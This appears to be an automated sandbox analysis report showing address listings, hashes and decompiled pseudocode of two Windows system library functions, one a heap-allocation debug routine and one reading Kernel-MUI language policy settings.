                                      0x0199a553
                                      0x0199a559
                                      0x019e2100
                                      0x019e2103
                                      0x019e2109
                                      0x019e210f
                                      0x019e2112
                                      0x019e2131
                                      0x019e2136
                                      0x019e2114
                                      0x019e2129
                                      0x019e212e
                                      0x019e213c
                                      0x019e2141
                                      0x019e2147
                                      0x019e214d
                                      0x019e2151
                                      0x019e2154
                                      0x019e2154
                                      0x019e2159
                                      0x019e2159
                                      0x019e2103
                                      0x0199a55f
                                      0x0199a562
                                      0x0199a565
                                      0x0199a567
                                      0x019e2162
                                      0x0199a56d
                                      0x0199a574
                                      0x0199a575
                                      0x0199a579
                                      0x0199a57e
                                      0x019e2169
                                      0x019e216a
                                      0x019e2170
                                      0x019e2175
                                      0x019e2179
                                      0x019e2179
                                      0x0199a57e
                                      0x0199a584
                                      0x0199a58f
                                      0x0199a58f
                                      0x0199a52b
                                      0x0199a5ad
                                      0x0199a5bc
                                      0x0199a5c1
                                      0x0199a5c6
                                      0x0199a5cb
                                      0x0199a5cd
                                      0x019e21a9
                                      0x0199a5d3
                                      0x0199a5d3
                                      0x0199a5d3
                                      0x0199a5d5
                                      0x0199a5d8
                                      0x019e21b3
                                      0x019e21bc
                                      0x019e21c2
                                      0x019e21cd
                                      0x019e21cf
                                      0x019e21da
                                      0x019e21da
                                      0x019e21da
                                      0x019e21f7
                                      0x019e21f7
                                      0x019e21c2
                                      0x0199a5de
                                      0x0199a5e3
                                      0x0199a5e8
                                      0x0199a5ea
                                      0x019e220a
                                      0x0199a5f0
                                      0x0199a5f0
                                      0x0199a5f0
                                      0x0199a5f2
                                      0x0199a5f5
                                      0x019e2219
                                      0x019e221b
                                      0x019e208c
                                      0x019e208c
                                      0x019e208c
                                      0x019e2095
                                      0x019e2096
                                      0x019e2097
                                      0x019e2098
                                      0x019e20a4
                                      0x019e20a5
                                      0x019e20a9
                                      0x019e20a9
                                      0x00000000
                                      0x0199a5f5
                                      0x0199a4bf
                                      0x0199a4d3
                                      0x0199a4d8
                                      0x0199a4da
                                      0x019e1ede
                                      0x019e1ede
                                      0x019e1ee4
                                      0x019e1ee9
                                      0x00000000
                                      0x00000000
                                      0x019e1f07
                                      0x00000000
                                      0x019e1f07
                                      0x0199a4e0
                                      0x0199a4e5
                                      0x0199a4e7
                                      0x019e20cb
                                      0x0199a4ed
                                      0x0199a4ed
                                      0x0199a4ed
                                      0x0199a4f2
                                      0x0199a4f5
                                      0x019e20d5
                                      0x019e20de
                                      0x019e20e4
                                      0x019e20f6
                                      0x019e20f6
                                      0x019e20e4
                                      0x0199a4fb
                                      0x00000000
                                      0x0199a4fb
                                      0x0199a4a1
                                      0x0199a4a4
                                      0x0199a4a8
                                      0x00000000
                                      0x00000000
                                      0x0199a4aa
                                      0x0199a4ac
                                      0x00000000
                                      0x00000000
                                      0x0199a4b2
                                      0x0199a4b5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0199a4b5
                                      0x0199a43a
                                      0x0199a340
                                      0x0199a346
                                      0x0199a600
                                      0x00000000
                                      0x0199a600
                                      0x0199a34f
                                      0x0199a351
                                      0x0199a358
                                      0x0199a3c6
                                      0x00000000
                                      0x0199a371
                                      0x0199a37a
                                      0x0199a37f
                                      0x0199a382
                                      0x0199a384
                                      0x0199a394
                                      0x00000000
                                      0x0199a396
                                      0x0199a399
                                      0x0199a3a7
                                      0x0199a3b0
                                      0x0199a3b4
                                      0x0199a3bb
                                      0x0199a3d2
                                      0x0199a3da
                                      0x0199a3df
                                      0x0199a3e1
                                      0x0199a3e5
                                      0x0199a3ea
                                      0x0199a3f0
                                      0x0199a3f0
                                      0x0199a3e1
                                      0x00000000
                                      0x0199a3bb
                                      0x0199a394

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                      • API String ID: 0-523794902
                                      • Opcode ID: e5c9f24069c2933e7c67af4c4a473fa01b9f507a413fd1675713bd3da55c6339
                                      • Instruction ID: 8e6bd14aa14d90d853575180ab2b5dd4a2edf10c4c06ad7fa9654ac53f1c27d6
                                      • Opcode Fuzzy Hash: e5c9f24069c2933e7c67af4c4a473fa01b9f507a413fd1675713bd3da55c6339
                                      • Instruction Fuzzy Hash: 7842B0316083419FDB16CF2DC488B2ABBE9FF98604F04496DF58A8B352D734D941CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A32D82, Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 64%
                                      			E01A32D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1a50e80);
				E019CD0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E019740E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E01A330C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E0197B150();
						} else {
							E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E0197B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E0198EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01A34496(_t181, 0);
						_t177 = L01994620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E01A349A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E01A2FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E01971F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E019A16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01A34496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x1a66360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x1a66364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1a66366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E0197B150();
								} else {
									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E01A1D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E0197B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E0197B150();
								} else {
									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E0197B150("Just allocated block at %p for %Ix bytes\n",  *0x1a66360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x1a66378 = 1;
									 *0x1a660c0 = 0;
									asm("int3");
									 *0x1a66378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x1a65708; // 0x0
					 *0x1a6b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E019CD130(0, _t177, _t181);
				}
			}





















                                      0x01a32d82
                                      0x01a32d84
                                      0x01a32d89
                                      0x01a32d8e
                                      0x01a32d90
                                      0x01a32d92
                                      0x01a32d97
                                      0x01a32d9a
                                      0x01a32da4
                                      0x01a32dc0
                                      0x01a32dc3
                                      0x01a32dd1
                                      0x01a32dd6
                                      0x01a32dd8
                                      0x01a330a7
                                      0x01a330a7
                                      0x01a330aa
                                      0x01a330aa
                                      0x01a330ad
                                      0x01a330b4
                                      0x00000000
                                      0x01a330b9
                                      0x01a32de3
                                      0x01a32de8
                                      0x01a32deb
                                      0x01a32dee
                                      0x01a32df1
                                      0x01a32df3
                                      0x01a32dfb
                                      0x01a32dfb
                                      0x01a32df5
                                      0x01a32df5
                                      0x01a32df5
                                      0x01a32e04
                                      0x01a32e0a
                                      0x01a32e0d
                                      0x01a32e11
                                      0x01a32e11
                                      0x01a32e12
                                      0x01a32e15
                                      0x01a32e18
                                      0x01a32e1a
                                      0x01a33027
                                      0x01a33027
                                      0x01a3302d
                                      0x01a33030
                                      0x01a3304f
                                      0x01a33054
                                      0x01a33032
                                      0x01a33047
                                      0x01a3304c
                                      0x01a3305a
                                      0x01a33063
                                      0x00000000
                                      0x01a32e20
                                      0x01a32e20
                                      0x01a32e23
                                      0x00000000
                                      0x00000000
                                      0x01a32e29
                                      0x01a32e2b
                                      0x01a32e47
                                      0x01a32e2d
                                      0x01a32e33
                                      0x01a32e38
                                      0x01a32e3f
                                      0x01a32e42
                                      0x01a32e42
                                      0x01a32e4e
                                      0x01a32e5d
                                      0x01a32e5f
                                      0x01a32e62
                                      0x01a32e66
                                      0x01a32e6b
                                      0x01a32e6d
                                      0x00000000
                                      0x01a32e73
                                      0x01a32e73
                                      0x01a32e76
                                      0x01a32e7a
                                      0x01a32e83
                                      0x01a32e83
                                      0x01a32e83
                                      0x01a32e85
                                      0x01a32e87
                                      0x01a32e8a
                                      0x01a32e8d
                                      0x01a32e92
                                      0x01a32e9c
                                      0x01a32e9f
                                      0x01a32ea1
                                      0x01a32ea2
                                      0x01a32ea6
                                      0x01a32ea6
                                      0x01a32e9f
                                      0x01a32eab
                                      0x01a32eaf
                                      0x01a32edf
                                      0x01a32ee2
                                      0x01a32ee5
                                      0x01a32eb1
                                      0x01a32eb3
                                      0x01a32eb8
                                      0x01a32ebd
                                      0x01a32ec4
                                      0x01a32ed6
                                      0x01a32ec6
                                      0x01a32ec7
                                      0x01a32ecc
                                      0x01a32ecf
                                      0x01a32ed2
                                      0x01a32ed2
                                      0x01a32ed9
                                      0x01a32ed9
                                      0x01a32ee8
                                      0x01a32eeb
                                      0x01a32eef
                                      0x01a32ef2
                                      0x01a32efe
                                      0x01a32f04
                                      0x01a32f04
                                      0x01a32f04
                                      0x01a32f06
                                      0x01a32f0d
                                      0x01a32f0f
                                      0x01a32f13
                                      0x01a32f13
                                      0x01a32f1b
                                      0x01a32f21
                                      0x01a32f27
                                      0x01a32f95
                                      0x01a32f98
                                      0x01a32f9b
                                      0x01a32fa0
                                      0x00000000
                                      0x00000000
                                      0x01a32fa6
                                      0x01a32fa9
                                      0x01a32fac
                                      0x00000000
                                      0x00000000
                                      0x01a32fb2
                                      0x01a32fb9
                                      0x00000000
                                      0x00000000
                                      0x01a32fc3
                                      0x01a32fca
                                      0x00000000
                                      0x00000000
                                      0x01a32fd0
                                      0x01a32fd6
                                      0x01a32fd9
                                      0x01a32ff8
                                      0x01a32ffd
                                      0x01a32fdb
                                      0x01a32ff0
                                      0x01a32ff5
                                      0x01a3300e
                                      0x01a3300f
                                      0x01a3301a
                                      0x00000000
                                      0x01a32f29
                                      0x01a32f29
                                      0x01a32f2c
                                      0x01a32f4b
                                      0x01a32f50
                                      0x01a32f2e
                                      0x01a32f43
                                      0x01a32f48
                                      0x01a32f56
                                      0x01a32f64
                                      0x01a32f6c
                                      0x01a32f6c
                                      0x01a32f72
                                      0x01a32f76
                                      0x01a32f7c
                                      0x01a32f83
                                      0x01a32f89
                                      0x01a32f8a
                                      0x01a32f8a
                                      0x00000000
                                      0x01a32f76
                                      0x01a32f27
                                      0x01a32e6d
                                      0x01a32da6
                                      0x01a32dab
                                      0x01a32db3
                                      0x01a32db9
                                      0x01a330bc
                                      0x01a330c1
                                      0x01a330c1

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                      • API String ID: 0-1745908468
                                      • Opcode ID: 6d4b369bf541b5c39c0c8d9a22d81ce4ac3e8e58a102ffeb6b228bf341803dcf
                                      • Instruction ID: 579f6155f8266bf53ebe484346ad10b91a43cbe0fe8c6f244a6532a0b1f80fc3
                                      • Opcode Fuzzy Hash: 6d4b369bf541b5c39c0c8d9a22d81ce4ac3e8e58a102ffeb6b228bf341803dcf
                                      • Instruction Fuzzy Hash: 5F91FF356146819FDB22DFA8D455BADFBF2BFC9710F18805EF54AAB252C7329842CB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01983D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E01983D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01981B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01981B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01981B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01981B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01981B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01994620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E019BF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E019C1370(_t276, 0x1954e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E019BBB40(0,  &_v68, _t170);
									if(L019843C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E019BBB40(_t257,  &_v68, _t243);
								if(L019843C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E019C1370(_t278, 0x1954e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01994620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E019BF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E019C1370(_v16, 0x1954e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E019BBB40(_t262,  &_v68, _t244);
								if(L019843C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E019C1370(_t282, 0x1954e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E019BBB40(_t262,  &_v68, _t201);
							if(L019843C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01994620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E019BF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E019C1370(_t280, 0x1954e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E019BBB40(_t267,  &_v68, _t245);
							if(L019843C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E019C1370(_t284, 0x1954e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E019BBB40(_t267,  &_v68, _t224);
						if(L019843C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                      0x01983d3c
                                      0x01983d42
                                      0x01983d44
                                      0x01983d46
                                      0x01983d49
                                      0x01983d4c
                                      0x01983d4f
                                      0x01983d52
                                      0x01983d55
                                      0x01983d58
                                      0x01983d5b
                                      0x01983d5f
                                      0x01983d61
                                      0x01983d66
                                      0x019d8213
                                      0x019d8218
                                      0x01984085
                                      0x01984088
                                      0x0198408e
                                      0x01984094
                                      0x0198409a
                                      0x019840a0
                                      0x019840a6
                                      0x019840a9
                                      0x019840af
                                      0x019840b6
                                      0x019840bd
                                      0x019840bd
                                      0x01983d83
                                      0x019d821f
                                      0x019d8229
                                      0x019d8238
                                      0x019d8238
                                      0x019d823d
                                      0x019d823d
                                      0x01983da0
                                      0x01983daf
                                      0x01983db5
                                      0x01983dba
                                      0x01983dba
                                      0x01983dd4
                                      0x01983e94
                                      0x01983eab
                                      0x01983f6d
                                      0x01983f84
                                      0x0198406b
                                      0x0198406b
                                      0x0198406e
                                      0x0198406e
                                      0x01984070
                                      0x01984074
                                      0x019d8351
                                      0x019d8351
                                      0x0198407a
                                      0x0198407f
                                      0x019d835d
                                      0x019d8370
                                      0x019d8377
                                      0x019d8379
                                      0x019d837c
                                      0x019d837c
                                      0x019d835d
                                      0x00000000
                                      0x0198407f
                                      0x01983f8a
                                      0x01983f8d
                                      0x01983f90
                                      0x01983f95
                                      0x019d830d
                                      0x019d830f
                                      0x01983f9b
                                      0x01983fac
                                      0x01983fae
                                      0x01983fb1
                                      0x01983fb1
                                      0x01983fb6
                                      0x019d8317
                                      0x019d831a
                                      0x00000000
                                      0x01983fbc
                                      0x01983fc1
                                      0x01983fc9
                                      0x01983fd7
                                      0x01983fda
                                      0x01983fdd
                                      0x01984021
                                      0x01984021
                                      0x01984029
                                      0x01984030
                                      0x01984044
                                      0x01984046
                                      0x01984046
                                      0x01984044
                                      0x01984049
                                      0x019d8327
                                      0x019d8334
                                      0x019d8339
                                      0x019d833c
                                      0x0198404f
                                      0x0198404f
                                      0x0198404f
                                      0x01984051
                                      0x01984056
                                      0x01984063
                                      0x01984063
                                      0x01984068
                                      0x00000000
                                      0x01984068
                                      0x01983fdf
                                      0x01983fe2
                                      0x01983fe4
                                      0x01983fe7
                                      0x01983fef
                                      0x01984003
                                      0x01984005
                                      0x01984005
                                      0x0198400c
                                      0x01984013
                                      0x01984016
                                      0x01984017
                                      0x0198401b
                                      0x0198401e
                                      0x00000000
                                      0x0198401e
                                      0x01983fb6
                                      0x01983eb1
                                      0x01983eb4
                                      0x01983eb7
                                      0x01983ebc
                                      0x019d82a9
                                      0x019d82ab
                                      0x01983ec2
                                      0x01983ed3
                                      0x01983ed5
                                      0x01983ed8
                                      0x01983ed8
                                      0x01983edd
                                      0x019d82b3
                                      0x019d82b6
                                      0x00000000
                                      0x01983ee3
                                      0x01983ee8
                                      0x01983eed
                                      0x01983ef0
                                      0x01983ef3
                                      0x01983f02
                                      0x01983f05
                                      0x01983f08
                                      0x019d82c0
                                      0x019d82c3
                                      0x019d82c5
                                      0x019d82c8
                                      0x019d82d0
                                      0x019d82e4
                                      0x019d82e6
                                      0x019d82e6
                                      0x019d82ed
                                      0x019d82f4
                                      0x019d82f7
                                      0x019d82f8
                                      0x019d82fc
                                      0x019d82ff
                                      0x019d82ff
                                      0x01983f0e
                                      0x01983f11
                                      0x01983f16
                                      0x01983f1d
                                      0x01983f31
                                      0x019d8307
                                      0x019d8307
                                      0x01983f31
                                      0x01983f39
                                      0x01983f48
                                      0x01983f4d
                                      0x01983f50
                                      0x01983f50
                                      0x01983f53
                                      0x01983f58
                                      0x01983f65
                                      0x01983f65
                                      0x01983f6a
                                      0x00000000
                                      0x01983f6a
                                      0x01983edd
                                      0x01983dda
                                      0x01983ddd
                                      0x01983de0
                                      0x01983de5
                                      0x019d8245
                                      0x01983deb
                                      0x01983df7
                                      0x01983dfc
                                      0x01983dfe
                                      0x01983e01
                                      0x01983e01
                                      0x01983e06
                                      0x019d824d
                                      0x019d824f
                                      0x019d8254
                                      0x00000000
                                      0x01983e0c
                                      0x01983e11
                                      0x01983e16
                                      0x01983e19
                                      0x01983e29
                                      0x01983e2c
                                      0x01983e2f
                                      0x019d825c
                                      0x019d825f
                                      0x019d8261
                                      0x019d8264
                                      0x019d826c
                                      0x019d8280
                                      0x019d8282
                                      0x019d8282
                                      0x019d8289
                                      0x019d8290
                                      0x019d8293
                                      0x019d8294
                                      0x019d8298
                                      0x019d829b
                                      0x019d829b
                                      0x01983e35
                                      0x01983e38
                                      0x01983e3d
                                      0x01983e44
                                      0x01983e58
                                      0x019d82a3
                                      0x019d82a3
                                      0x01983e58
                                      0x01983e60
                                      0x01983e6f
                                      0x01983e74
                                      0x01983e77
                                      0x01983e77
                                      0x01983e7a
                                      0x01983e7f
                                      0x01983e8c
                                      0x01983e8c
                                      0x01983e91
                                      0x00000000
                                      0x01983e91

                                      Strings
                                      • Kernel-MUI-Language-Disallowed, xrefs: 01983E97
                                      • Kernel-MUI-Language-Allowed, xrefs: 01983DC0
                                      • Kernel-MUI-Number-Allowed, xrefs: 01983D8C
                                      • Kernel-MUI-Language-SKU, xrefs: 01983F70
